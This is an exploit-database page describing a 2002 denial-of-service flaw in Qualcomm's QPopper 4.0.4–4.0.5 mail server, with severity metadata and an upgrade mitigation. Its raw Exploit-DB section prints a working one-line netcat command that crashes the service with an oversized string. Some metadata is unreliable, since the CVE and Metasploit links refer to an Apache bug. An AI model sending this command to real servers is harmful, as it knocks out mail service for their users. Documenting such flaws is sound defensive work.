header-logo
Suggest Exploit
vendor:
QPopper
by:
SecurityFocus
4.3
CVSS
MEDIUM
Denial of Service
400
CWE
Product Name: QPopper
Affected Version From: 4.0.4
Affected Version To: 4.0.5
Patch Exists: YES
Related CWE: CVE-2002-0392
CPE: o:qualcomm:qpopper
Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2002-0392/https://www.rapid7.com/db/vulnerabilities/http-apache2-chunked-transfer-int-bof/https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-apache-chunked-encoding-vulnerability-cve-2002-0392/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Unix
2002

Qualcomm’s QPopper Denial of Service Vulnerability

A vulnerability has been reported in some versions of qpopper, where if a string of longer than approximately 2048 characters is sent to the qpopper process, a denial of service condition will occur. An example of this exploit is using the perl command to print a string of 2049 characters to the qpopper process via netcat.

Mitigation:

Upgrade to the latest version of QPopper.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4295/info

Qualcomm's QPopper is a POP3 mail server for Linux and Unix based systems. Recent versions of QPopper have been released as open source projects.

A vulnerability has been reported in some versions of qpopper. Reportedly, if a string of longer than approximately 2048 characters is sent to the qpopper process, a denial of service condition will occur. 

perl -e '{print "A"x"2049"}' | netcat host.com 110

Navigation

Suggest Exploit

Services By CQR